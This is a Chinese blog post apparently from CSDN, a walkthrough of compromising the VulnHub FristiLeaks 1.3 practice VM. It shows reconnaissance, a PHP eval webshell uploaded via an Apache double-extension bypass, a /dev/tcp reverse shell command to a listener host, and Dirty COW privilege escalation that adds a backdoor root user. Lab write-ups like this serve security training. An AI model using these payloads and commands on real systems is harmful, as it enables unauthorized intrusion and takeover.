FristiLeaks靶场打靶记录

于 2024-09-29 16:08:43 发布
阅读量673 收藏 5
点赞数 26
分类专栏: FristiLeaks靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64703089/article/details/142637822
版权

一、靶机介绍

靶机下载地址:https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova

二、信息收集

扫描靶机ip

arp-scan -l

确认靶机ip为:192.168.5.132

扫描端口

nmap -p- -A 192.168.5.132

扫描目录

dirb http://192.168.5.132/

进入网站

打开robots.txt目录

发现三个目录/cola、/sisi、/beer

发现三个目录,貌似都是一张图片,没有太多信息,但从图片的提示说,这不是一个url连接,你还需要去寻找,或许在本页面就有提示

我们回到首页,仔细再找找,最终发现这个FRISTI是一个目录,进入http://192.168.5.132/fristi/

F12看看网页源代码

其中有个by eezeepz的可能是用户名

还有一句:

We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it

翻译过来就是:

我们对图像使用base64编码,因此它们在HTML中是内联的

大概意思是下面的这串绿绿的字是图片经过base64编码后的,试着还原一下,先把它base64解密

https://www.ddosi.org/code/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)&ieol=CRLF&oeol=VT

解码后的数据可以看出是个png文件,点击将输出保存到文件,发现貌似是密码

回到登录页面登录

用户名:eezeepz
密码:keKkeKKeKKeKkEkkEk

登陆成功

发现文件上传点,尝试上传带有一句话木马的php文件发现失败,说是只允许上传png,jpg,gif格式的文件

看看Wappalyzer插件后发现是apache 2.2.15版本,那就结合apache 2.x版本的多后缀名解析漏洞绕过上传

三、Getshell

再次上传php文件同时bp开启拦截,文件内容为php探针(方便查看)和一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

在 filename 这里给文件名字加上 .png 的后缀绕过上传同时可以通过apache的解析漏洞解析为php

上传成功并且给出了上传的路径为 /uploads 文件夹下

那就直接访问一下,发现了我们的探针文件

直接蚁剑连接,密码cmd

连接成功后我们要尝试将控制权交给kali方便下一步提权

这里我们用反弹shell的方法

先在kali上起一个监听,端口为9999(也可以用其他的没有被占用的端口)

nc -lvvp 9999

然后打开蚁剑的虚拟终端,输入反弹shell并执行

sh -i >& /dev/tcp/192.168.5.32/9999 0>&1

连接成功,转为交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

四、权限提升

通过查看系统内核发现符合脏牛提权的要求

我们直接使用脏牛提权,该漏洞影响linux2.6.22 版本至 4.6 版本的所有 Linux 系统

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) - Linux local Exploit (exploit-db.com)

下载对应的exp

上传到tmp目录下

然后cd到/tmp目录对其进行编译

gcc -pthread 40839.c -o 40839 -lcrypt

cat /etc/passwd发现后门用户被创建

直接 su firefart 切换用户

提权成功!

安全beginner
关注
专栏目录
pikachu靶场通关记录
weixin_45682839的博客
04-01 2709
pikachu靶场通关记录
以太Ethernaut靶场打靶—5 Token
weixin_49340699的博客
10-27 575
以太Ethernaut靶场打靶—5 Token 概括 本题主要利用智能合约里的整型溢出漏洞来实现攻击; 整型溢出:在 solidity 中,当一个整型变量高于或者低于他所能承受的范围时,就会发生溢出,导致一些不可预期的情况出现。例如,当用户转账金额超过系统预设的最大值时,只要用户金额大于零,用户就可以直接将巨额的代币转走。 要求 获取代币越多越好。 源码审计 // SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Token {
vulhub靶场打靶记录
宝儿姐的博客
02-27 201
靶场通关记录
MONEYBOX: 1靶场打靶
m0_58177121的博客
08-21 1311
前言 这是vulnhub上的一个简单靶场,网上冲浪的时候发现就下载下来做了一下,发点靶场的渗透过程,就当是学习笔记了。靶场地址http://www.vulnhub.com/entry/moneybox-1,653/#download 如果VMware里配置靶场环境有问题的话就下个Virtualbox,把靶机的ova文件导入到Virtualbox里。Virtualbox的下载路径https://www.virtualbox.org/ 配置靶场环境时遇到的坑 在导入ova文件到Virtualbox的
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3
LYJ20010728的博客
08-06 1467
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3环境下载TOPHATSEC: FRESHLY靶机搭建渗透测试信息搜集漏洞挖掘 环境下载 戳此进行环境下载 TOPHATSEC: FRESHLY靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式,虚拟机的MAC地址为:08:00:27:A5:A6:76 获取到目标靶机的IP为:192.168.246.132 渗透测试 信息搜集 用Nmap扫描一下目标靶机:sudo nmap -sS -A 192.168.246.
OSCP推荐靶场-FristiLeaks
qq_63785498的博客
10-06 509
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
ack123打靶记录
lightsec
03-20 4977
前言: 此靶场是月师傅九月出师考核靶场,搭建过程参考文章红队考核靶场ack123下载和搭建 靶场地址:https://pan.baidu.com/s/13g_1FFg-ZYYpBwkCvKyYWQ提取码:7fkj 靶场拓扑图: 靶场的主要考点: 1.站库分离 外网打点 2.过360全家桶 3.过windwos defender 4.过火绒 5.内网漫游 6.多层网络渗透 7.横向渗透 8.jwt token密钥破解 9.权限提升 10.域渗透 11.phpmyadm..
以太Ethernaut靶场打靶—6 Delegation
weixin_49340699的博客
10-27 593
以太Ethernaut靶场打靶—6 Delegation概括源码审计攻击 概括 本题主要是利用delegatecall函数的不严谨使用导致可以调用其他函数获取合约所有权可参考https://blog.openzeppelin.com/on-the-parity-wallet-multisig-hack-405a8c12e8f7/ 对比: call: 最常用的调用方式,调用后内置变量 msg 的值会修改为调用者,执行环境为被调用者的运行环境(合约的 storage)。 delegatecall: 调用后内置变
以太Ethernaut靶场打靶—0 Hello Ethernaut
weixin_49340699的博客
10-26 451
以太Ethernaut靶场打靶—0 Hello Ethernaut 概括 第0关主要还是一些解释性的东西能读懂英文就行 有提及一点是我们后续的打靶需要用到ether测试币所以要去领一些 安装MetaMask创建钱包 首先我们要先创建钱包这里用到一个扩展程序在火狐,谷歌都有 在注册完成后会得到一个钱包及一个账户地址记得(保管好助记词) 领取ether测试币 在程序中我们把网络设置为Rinkeby测试网络 然后去这个网站https://faucet.rinkeby.io/可以免费领取测试币 方法 用你的tw
webgoat靶场通关记录
wanan的博客
01-24 298
webgoat靶场通关记录
【vlunhub靶场打靶记录】breach1打靶
weixin_54603520的博客
05-11 302
breach1打靶记录,难度中上游,主要考验打靶时思维的灵活性以及对渗透过程中不同的方向的广度深度!需要打靶人员能够有较多的渗透经验和较强的变通能力以及比较好的耐心!
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 615
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
【红日靶场打靶】内网靶场打靶记录红日2
weixin_54603520的博客
05-17 194
靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/默认密码:1qaz@wsX。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8478
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
CRM后台原型模板 #产品原型#Axure# 文件大小6.21M,系统业务分为12个核心模块:管理中心、系统公告、企业设置、组织
09-28
CRM后台原型模板 #产品原型#Axure# 文件大小6.21M,系统业务分为12个核心模块:管理中心、系统公告、企业设置、组织架构、职务权限、员工管理、模块管理、产品管理、业务设置、字段设置、字典管理、日志管理等。 对于想做产品的同学或者想深入了解CRM后台系统的朋友,极具研究学习价值和办公使用价值 致力于让产品人专注产品本身,不受原型实现的困扰~ 适合人群:互联网产品经理、学习使用axure的同学
metasploit_in_termux-master.zip
09-28
metasploit_in_termux-master.zip
基于C#、CSS、JavaScript和HTML的甜品网站设计源码
09-28
该项目是一款甜品主题的网站设计源码,由806个文件组成,涵盖296个JPG图片、142个C#源代码文件、126个DLL库文件、44个ASPX页面文件、20个配置文件、18个缓存文件、17个PNG图片文件、16个可执行文件、14个PDB调试文件、14个JPEG图片文件。代码主要采用C#、CSS、JavaScript和HTML语言编写,适用于甜品行业的在线展示和销售需求。
数字政府智慧政务大数据治理平台、大数据资源中心技术解决方案Word(266页).docx
09-28
数据治理是确保数据准确性、可靠性、安全性、可用性和完整性的体系和框架。它定义了组织内部如何使用、存储、保护和共享数据的规则和流程。数据治理的重要性随着数字化转型的加速而日益凸显,它能够提高决策效率、增强业务竞争力、降低风险,并促进业务创新。有效的数据治理体系可以确保数据在采集、存储、处理、共享和保护等环节的合规性和有效性。 数据质量管理是数据治理中的关键环节,它涉及数据质量评估、数据清洗、标准化和监控。高质量的数据能够提升业务决策的准确性,优化业务流程,并挖掘潜在的商业价值。随着大数据和人工智能技术的发展,数据质量管理在确保数据准确性和可靠性方面的作用愈发重要。企业需要建立完善的数据质量管理和校验机制,并通过数据清洗和标准化提高数据质量。 数据安全与隐私保护是数据治理中的另一个重要领域。随着数据量的快速增长和互联网技术的迅速发展,数据安全与隐私保护面临前所未有的挑战。企业需要加强数据安全与隐私保护的法律法规和技术手段,采用数据加密、脱敏和备份恢复等技术手段,以及加强培训和教育,提高安全意识和技能水平。 数据流程管理与监控是确保数据质量、提高数据利用率、保护数据安全的重要环节。有效的数据流程管理可以确保数据流程的合规性和高效性,而实时监控则有助于及时发现并解决潜在问题。企业需要设计合理的数据流程架构,制定详细的数据管理流程规范,并运用数据审计和可视化技术手段进行监控。 数据资产管理是将数据视为组织的重要资产,通过有效的管理和利用,为组织带来经济价值。数据资产管理涵盖数据的整个生命周期,包括数据的创建、存储、处理、共享、使用和保护。它面临的挑战包括数据量的快速增长、数据类型的多样化和数据更新的迅速性。组织需要建立完善的数据管理体系,提高数据处理和分析能力,以应对这些挑战。同时,数据资产的分类与评估、共享与使用规范也是数据资产管理的重要组成部分,需要制定合理的标准和规范,确保数据共享的安全性和隐私保护,以及建立合理的利益分配和权益保障机制。
ssm9292农产品供销服务系统.zip
最新发布
09-28
技术选型 【后端】:Java 【框架】:ssm 【前端】:vue/jsp 【JDK版本】:JDK1.8 【服务器】:tomcat7+ 【数据库】:mysql 5.7+ 包含:项目源码、数据库脚本、项目功能介绍文档等,该项目源码可作为毕设使用。 项目都经过严格调试,确保可以运行! 具体项目介绍可查看博主文章
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值